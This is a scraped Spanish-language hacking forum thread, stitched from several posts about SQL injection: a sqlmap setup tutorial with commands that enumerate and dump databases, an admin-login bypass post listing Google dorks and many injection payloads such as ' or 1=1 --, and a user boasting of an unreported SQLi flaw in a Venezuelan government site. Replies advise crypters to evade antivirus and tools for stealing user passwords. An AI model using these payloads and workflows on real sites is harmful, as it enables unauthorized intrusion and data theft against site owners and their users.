Excelente! a leerlo

Usa algún crypter para que no lo pueda detectar ,

Holaa Underc0de acá les comparto otros pdfs ! sobre Manuales y Guias SQLI

Contenido:
Introducción a las inyección sqli
ejemplos! de ataques
Técnicas
SQLMAP(python xD lo pongo ya que esta desarrollado en python) 
y machas mas cosas

enlace : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

espero que lo entiendan

PD: no soy el autor y no puedo poner todos los cerditos ya que cada pdf esta echo por distinto autor ! lo siento :l pero se les agradece   de todos modos ! !
y no me hago responsable con lo que aprendas y no hagan  cagadas con lo que aprenden leyendo 

Saludos ! 

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Excelente recopilación, gracias por compartirlo!! 

De nada , lo tenia en mi la pc de hace muchoo xD y lo fui leyendo cosas que me gustaban y lo comparto  aquí también !

Salu2!

hola que tal Underc0de hace mucho tenia en mi ordenador un pack de muchas cosas pero muchoo y lo fui leyendo !

Cosas que tiene el pack :
sql Injection
cursos
cracking
BackTrack
Base de datos
Python
Programación !
y muchas cosas interesantes !!
tecnicas de inyeccion sql  y mucho !!

Espero que lo lean !

Enlace: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

PD : no soy el autor de estos documentos ! , no puedo dar los créditos ya que son muchos ducumentos echos por distinta gente pero se les agradece a los que lo hicieron

Saludos!!!!!!!   

Bueno esta bastante bien el curso mufero , los que recién andan entrando al tema les viene muy bien !


Saludos !

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
El navegador NO es anonimo, simplemente evita la censura de algunas paginas que no se pueden acceder en los paises y ellos mismo lo dicen en su pagina: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta !
Un saludo

Sii yo también lo e visto eso !

Saludos!!!!!

Hola Gente de Underc0de Bueno les traigo este navegador

Aquí una imagen :



Su descarga : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Una vez descargado lo ejecutan y lo descomprimen donde quieran 

acá una imagen



y ya lo tendrían instalado

pd: ¿Para que sirve? pues no se si es 'algo' parecido a tor pero nos deja navegar 'anonimamente '


Saludos !!!!!!!!

Bienvenido Bro!!!!! Te as Registrado en un Buen Lugar

Muy Bueno encima veo que es tu yo Nicee 

Pues Puede aver archivos sin utilización , eliminarlos ,, Puedes descargar el CCleaner

Con el CCleaner puedes reparar errores del registro, limpiar el historial ect ect  y siempre tener el anti-virus actualizado si hace falta descargar otro mejor ( ojo no tener 2 anti-virus ) solo uno ..

Hola Gente de Underc0de 

¿Porque hago este tuto?

Bueno la verdad lo hago porque muchas personas tienen dudas : como? : ¿No lo se usar? , ¿No me abre?

Jjajaj cuando aveces tienen la duda de que no les abre es porque necesitan python , ya que la herramienta esa desarrollada en python


Seguir mis pasos

1-Descargar python
PD: Si tienen windows , descargar la versión de python para windows 7 , o el que tengan xD

Acá un panta (mio )

Python :


Descargar:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

2- El Sqlmap
Pagina Oficial : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
PD: Es la oficial así que descarguen sin problem

Otro panta (mio


3- Cuando tengan Descargado todo Instalan el Python en el disco local C


no mía la imagen

4-  y el sqlmap también copian y pegan en el disco local C

5- Esta es la parte que mas se equivocan porque algunos le pasa ¿Como lo abre?

Seguir mis pasos :

CMD  (ABRIRLO)

Una vez abierto poner :

CD..
y otra vez CD.. y poner cd sqlmap

Imagen(mia)


Por ultimo
Tienen que hacer esto les dejos los comandos

COMANDOS :



1. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -u ((buee su : (la pagina)TARGET.ASSED.COMxD) --dbs

2. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -u ((buee su : (la pagina)TARGET.ASSED.COMxD) -D (Nombre de la BD) --tables

3. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -u (buee su : (la pagina)TARGET.ASSED.COMxD) -D (Nombre de la BD) -T (Nom. de la tabla) --columns

4. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -u (buee su : (la pagina)TARGET.ASSED.COMxD) -D (Nombre de la BD) -T (Nom. de la tabla) -C (Nom. de la columna) --dump


eso es todo Saludos !

PD: SIN LOS PARÉNTESIS AL PONER ,es decir , -u ejemplo -dbs  (sqlmap.py)

Bienvenido Bro , Ya veras que también aprenderás mas cosas


Saludos!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No entiendo :/
lo de select columna1,columna2,columna3 from tabla where id='967' Union Select 1,2,3  -- - ' ya no lo entendí
Tengo una pagina vulnerable, la estoy usando como practica jajaja, pero no entiendo eso.
Saludos

Significa como es que esta formada la consulta en realidad por dentro, siempre que estes haciendo una inyeccion sql necesitas imaginar como el programador, en este caso para usar UNION siempre se deben usar el mismo numero de columnas en este caso 3 de esa manera la union estara realizada correctamente, si no te arroja un error The used SELECT statements have a different number of columns saludos

Ese error me  brotaba muy seguido, pero sigo sin entender, ¿debes poner 'columna1,columna2,columna3'?, o es algún ejemplo?. :s

Se refiere a  columna1,columna2,columna3 : 1,2,3

Sal2

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Tendre que bajarlos y hecharles una revisada, estoy muy oxidado en SQLi 
Vale que buen aporte, y vamos a ver si este hombre sigue compartiendo conocimiento 

Pues Si son muy buenos 

Sal2

Bueno como dice hoy are un tutorial sobre el bypass admin panel (SQL) ,es decir, bypasear  panel (admin)


algunos dorks


Dorks :

inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp

lo aremos con una simple consulta SQL
,,,

Acá una imagen (mía)




algunos tipos de consultas :

' or 1=1 –
1'or'1'='1
admin'–
" or 0=0 –
or 0=0 –
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1–
" or 1=1–
or 1=1–
' or a=a–
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 –
hi' or 1=1 –

Sitio que use de ejemplo : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Bueno Un saludo Undercode 

Hola Gente  Andando por ahi entre a la pagina del gob de Vene me puse a ver unas cosas y me tope

con una vulne SQLI

Reportada: No

Imagen :



pd: me la encontré googleando el sitio ese de vene (gob)


Salu2

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Me gustaria que hubiera mas como el, comparte valioso conocimiento gratis xD

Ehh en realidad eso se encuentra en muchos lados nada mas que hay tutoriales pero no explican cosas ,, como esta explicando el

Sal2

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
buena data... pero yo soy de los tipicos lammers que le gustan las cosas rapidas con solo un programa., Que recomiendan como el mejor de todos¿?.....el pangolin professional editions, el havij 1.6......o cual¿? yo resien use el pangolin y inyecte una pagina de la cual ya sabia que se podria sacar su password y nick de usuario pero no se porque no se le cargo la data de la base de datos ahora estoy bajando havij 1.6.....recomiendenme algo que si sirva!!! gracias \☻/ soy nuevo por aca... buen foro •saludos•

Faquir Hola Pues sinceramente si no lo haces de manual intenta con SQLMAP O THEMOLE , Havij no me gusta de nda así que si lo vas a hacer automatizado hazlo con : sqlmap , necesitaras de python ya que la herramienta es desarrollada por python

Sal2

Hola Underc0de Soy Nuevo en la comunidad , recién ando empezando  pero e aprendido poco a poco con temitas muy buenos que hay a qui en la comunidad

Bueno me vi una clases de SQL inyeccion son muy buenas las recomiendo


CLASE 1 :



1.- Concepto de SQLi (SQL Injection)
2.- Entender como funciona MySQL
3.- ¿Cómo identificar las inyecciones SQL?
- Concatenaciones
- Operadores matemáticos
- Errores
4.- Entendiendo los distintos tipos de sentencias SQL

Clase 2




1. Herramientas que nos ayudan a identificar SQLi
2. Obtener información a través de SQLi
3. Inyecciones basadas en UNIONES
- Obtener número columnas con ORDER BY: Búsqueda binaria
- Realizando la inyección con uniones
4. Funciones básicas de MySQL
- Función: Database, user, current_user, datadir
5. Funciones de concatenación: CONCAT, GROUP_CONCAT, CONCAT_WS
5. Analizando la base de datos: INFORMATION_SCHEMA

Clase 3 :



1. Obtener información(registros) de las Bases de Datos
2. Obtener información de la Base de Datos MYSQL
- Tabla User
- Doble SHA1, funcion password

3. Craking de contraseñas
- Rainbow tables
4. Ataques con SQLMAP

y por ultimo la clase 4

Clase 4 :


1. Desarrollo de script en python para automatizar SQLi <- este esta excelente 
2. Inyección de código en páginas web vulnerables

Bueno para los que no saben lo que es la inyeccion sql   
Buena la inyeccion sql  es un metodo de infiltracionn de codigo intruso que se vale de una vulnerabilidad informática presente en una aplicación en el nivel de validación de las entradas para realizar consultas a una base de datos.

Sal2
Espero que les guste

PD : SI NO TIENES MUCHA IDEA NO ENTENDERÁS LAS CLASES AL TOQUE CUANDO LAS VEAS , VELAS BARIAS VECES